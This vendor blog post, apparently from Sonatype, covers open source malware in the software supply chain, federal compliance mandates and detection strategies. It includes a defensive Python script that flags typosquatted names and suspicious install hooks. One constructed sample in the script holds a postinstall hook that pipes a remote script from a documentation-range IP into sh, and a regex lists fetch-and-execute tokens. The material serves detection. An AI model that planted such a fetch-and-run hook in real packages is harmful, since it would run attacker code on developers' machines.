
The hidden threat: Tackling malware in your software supply chain

The value of open source is undeniable — 90% of all modern software development depends on it. According to Harvard Business School, in 2024 alone, more than 6 trillion open source software components were downloaded, representing almost $9 trillion in value to users.

As a result, the security of open source software is a growing concern across the industry, and particularly for federal agencies. Threats targeting open source dependencies are growing in both sophistication and frequency, and high-profile incidents such as the SolarWinds build-system compromise and the Log4Shell vulnerability in Log4j have demonstrated the potential impact.

This is putting pressure on developers whose responsibility it is to serve the public trust. In this blog, we discuss why addressing the malware threat in your supply chain is critical, including the risks malware represents, detection and mitigation strategies, and regulatory requirements to boost our cybersecurity posture.

Malware vs. vulnerabilities: Understanding the difference

Malware is software intentionally designed to do harm, whether by gaining unauthorized access or otherwise compromising systems. It has been with us for years, spreading through email attachments, malicious websites, and compromised devices. But alongside the growth in the use of OSS components, we have seen the emergence of open source malware: malicious code disguised as a legitimate component and published to public repositories so that developers pull it in as a dependency.

In contrast, a vulnerability is a weakness that can be exploited to gain unauthorized access to a system, cause damage, or manipulate it in some way. Vulnerabilities are typically unintentional defects, but they still leave a system open to attack.

Attackers are evolving from exploiting vulnerabilities in legitimate components to injecting malware directly into open source ecosystems. This is a particularly dangerous threat because no vulnerability has to be found or exploited: the malicious code is the component, it runs with the developer's or build system's privileges as soon as the package is installed or imported, and it reaches every downstream project that pulls in the dependency.

  • Open source malware: A malicious component is created for the purpose of introducing risk into the development process.

  • Vulnerable open source component: A legitimate open source component in which a coding or design mistake inadvertently introduces risk.

The growing threat of open source malware

Open source malware is on the rise, partly because OSS repositories present an attractive attack point. Sonatype estimates that as many as half of all unprotected repositories already have cached open source malware. A startling finding from the 2024 State of the Software Supply Chain report was a 156% increase in malicious packages identified from 2023 to 2024. In fact, Sonatype has identified 810,993 pieces of open source malware since we started tracking it in 2019.

Government organizations are under assault in particular, experiencing the highest number of attempted malware attacks last year – more than 300,000 – making up 67.31% of the total malware attacks blocked by Sonatype in 2024.

Some examples of high-profile malware attacks include Tea.yaml, where hackers exploited the "Tea" protocol by flooding npm and PyPI with Potentially Unwanted Applications (PUAs). More recently, the JavaScript library Lottie Player was compromised when attackers released three malicious versions that led to significant financial losses, including one reported phishing incident resulting in more than $723,000 stolen.

Federal mandates and compliance requirements for software supply chain security

To help meet the challenge of malware and the vulnerability of software supply chains, we've seen a flood of federal mandates designed to provide guidance and best practices for federal contractors and software providers.

Guidance such as CISA's Secure by Design initiative emphasizes proactive security measures, while OMB Memorandum M-22-18 requires federal agencies to obtain attestations from software producers that their products were developed following secure practices. Executive Order 14028 and NIST SP 800-218, the Secure Software Development Framework (SSDF), establish those practices for securing the software lifecycle, compelling organizations to integrate security from the ground up. SBOM (software bill of materials) expectations and CISA's Secure Software Development Attestation Form demand greater transparency, ensuring that software vendors disclose their dependencies and certify conformance with federal security standards.

Why traditional security measures fall short against malware

Traditional security measures, antivirus software and perimeter defenses, are no longer up to the task. Attackers keep evolving, using malware that evades signature-based detection and bypasses firewalls. Simply scanning for known vulnerabilities isn't enough: a newly published malicious package has no CVE and no signature, so a scanner that only flags pre-identified risks lets it through. Malware can be hidden in open source dependencies or disguised as a routine software update, and it slips past scans that look only for what has already been catalogued.

A proactive approach to software supply chain security is essential.

Continuous monitoring, automated dependency analysis, and behavior-based threat detection help identify and block malicious components before they cause harm. Sonatype's intelligence-driven security solutions go beyond traditional defenses, ensuring developers use only trusted, vetted components — stopping malware at its source rather than reacting after the damage is done.

How to detect and prevent malware in your software supply chain

Prevention is the name of the game, which means detecting suspicious dependencies before they have the opportunity to cause harm. Warning signs include typosquatting (a package name one keystroke away from a popular one), recently published packages with little community adoption, and unexpected behaviors in updates, such as a new version that suddenly adds an install-time script.
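These warning signs can be turned into a mechanical pre-install check. What follows is an added example written for this page, not Sonatype's code and not how Repository Firewall works internally. It scores constructed package-metadata records against three heuristics: name similarity to a well-known package (typosquatting), a young package with few downloads, and install-time hooks that appear in an update or that fetch remote code. The allowlist, the field names on `PackageMeta`, the thresholds (30 days, 100 weekly downloads) and the sample records are all assumptions for illustration.

```python
"""Heuristic triage of package metadata for supply-chain malware warning signs.

Added example, not Sonatype's code. Field names, thresholds and sample data are
assumptions chosen for illustration.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional

# Well-known packages a typosquat would imitate (constructed; a real deployment
# would use the organization's approved-component list).
KNOWN_PACKAGES = {"requests", "lodash", "express", "numpy", "colorama"}

# npm package.json script names that run automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Tokens that, inside an install script, usually mean "download and run something".
REMOTE_EXEC_TOKENS = re.compile(
    r"curl|wget|https?://|base64|eval|child_process|\bsh\b|bash|powershell", re.IGNORECASE
)

NEW_PACKAGE_WINDOW = timedelta(days=30)      # assumed threshold
LOW_ADOPTION_WEEKLY_DOWNLOADS = 100          # assumed threshold


@dataclass
class PackageMeta:
    name: str
    ecosystem: str                                   # "npm" or "pypi"
    published: datetime                              # tz-aware publish time of this version
    weekly_downloads: int
    scripts: dict = field(default_factory=dict)      # npm: package.json "scripts"
    has_setup_hooks: bool = False                    # pypi: setup.py overrides the install command
    previous_scripts: Optional[dict] = None          # npm scripts of the prior version, if known


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_target(name: str) -> Optional[str]:
    """Return the well-known package this name most closely imitates, or None."""
    if name in KNOWN_PACKAGES:
        return None
    norm = name.lower().replace("_", "-")
    best = None
    for known in sorted(KNOWN_PACKAGES):
        limit = 2 if len(known) >= 6 else 1       # short names need a tighter bound
        dist = osa_distance(norm, known)
        if dist <= limit and (best is None or dist < best[0]):
            best = (dist, known)
    return best[1] if best else None


def triage(meta: PackageMeta, now: datetime) -> list:
    """Apply the warning-sign heuristics and return human-readable findings."""
    findings = []
    target = typosquat_target(meta.name)
    if target:
        findings.append(f"typosquat: '{meta.name}' resembles well-known package '{target}'")
    age = now - meta.published
    if age <= NEW_PACKAGE_WINDOW and meta.weekly_downloads < LOW_ADOPTION_WEEKLY_DOWNLOADS:
        findings.append(f"new and unadopted: published {age.days} days ago, "
                        f"{meta.weekly_downloads} weekly downloads")
    if meta.ecosystem == "npm":
        hooks = {k: v for k, v in meta.scripts.items() if k in NPM_LIFECYCLE_HOOKS}
        for hook, cmd in hooks.items():
            if REMOTE_EXEC_TOKENS.search(cmd):
                findings.append(f"install hook '{hook}' appears to fetch or execute remote code: {cmd!r}")
        if meta.previous_scripts is not None:
            added = set(hooks) - (set(meta.previous_scripts) & NPM_LIFECYCLE_HOOKS)
            if added:
                findings.append(f"update adds install hook(s) the previous version lacked: {sorted(added)}")
    elif meta.ecosystem == "pypi" and meta.has_setup_hooks:
        findings.append("setup.py overrides the install command, so pip install runs arbitrary code")
    return findings


def verdict(findings: list) -> str:
    """Policy: block on hard indicators, send soft indicators to review, otherwise allow."""
    hard = ("typosquat", "install hook", "update adds", "setup.py")
    if any(f.startswith(hard) for f in findings):
        return "block"
    return "review" if findings else "allow"


# Constructed sample records (not real packages); 203.0.113.0/24 is a documentation range.
NOW = datetime(2025, 1, 15, tzinfo=timezone.utc)
SAMPLES = [
    PackageMeta("reqeusts", "pypi", NOW - timedelta(days=3), 12, has_setup_hooks=True),
    PackageMeta("lodash", "npm", datetime(2016, 2, 1, tzinfo=timezone.utc), 50_000_000,
                scripts={"test": "mocha"}),
    PackageMeta("fancy-spinner", "npm", NOW - timedelta(days=1), 40,
                scripts={"postinstall": "curl -s http://203.0.113.7/s.sh | sh", "test": "jest"},
                previous_scripts={"test": "jest"}),
]


def triage_samples() -> dict:
    """Run triage over the constructed samples; returns {name: (verdict, findings)}."""
    return {m.name: (verdict(triage(m, NOW)), triage(m, NOW)) for m in SAMPLES}


if __name__ == "__main__":
    for name, (decision, findings) in triage_samples().items():
        print(f"{name}: {decision}")
        for f in findings:
            print(f"  - {f}")
```

The transposition-aware distance matters because the most common typosquats swap two adjacent letters ("reqeusts"), which plain Levenshtein scores as two edits. The "added install hook" check is the cheapest way to catch the Lottie Player pattern described above, where a trusted package's new version suddenly behaves differently; in practice it should run against the registry's version history rather than a single prior version.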

Software composition analysis (SCA) tools can be an enormous advantage in identifying and mitigating these threats. For example, Sonatype Lifecycle continuously scans dependencies, detecting known vulnerabilities and uncovering hidden risks. The advanced malware detection engine of Sonatype Repository Firewall goes further, proactively blocking both known and unknown threats before they reach your pipeline.

Taking action: Strengthening your software supply chain security

Federal mandates are amping up the pressure on federal organizations to raise the bar for their software supply chain security. Proactive risk mitigation is essential for compliance, including SBOM management, automated dependency management, enforced approval workflows, and integrity checks on the components entering their development environments.

In addition to being proactive, a security-first culture is important. Organizations that integrate security into their development and deployment processes will be much better prepared to stave off malware threats and remain in compliance. By leveraging automation, trusted sources, and actionable intelligence, enterprises can build resilient software supply chains, minimizing exposure to malware and vulnerabilities.

Learn more about Sonatype's malware detection and federal compliance solutions.


Written by Charlie Suter

Charlie Suter is the Director, Special Programs and Air Force/MDA at Sonatype.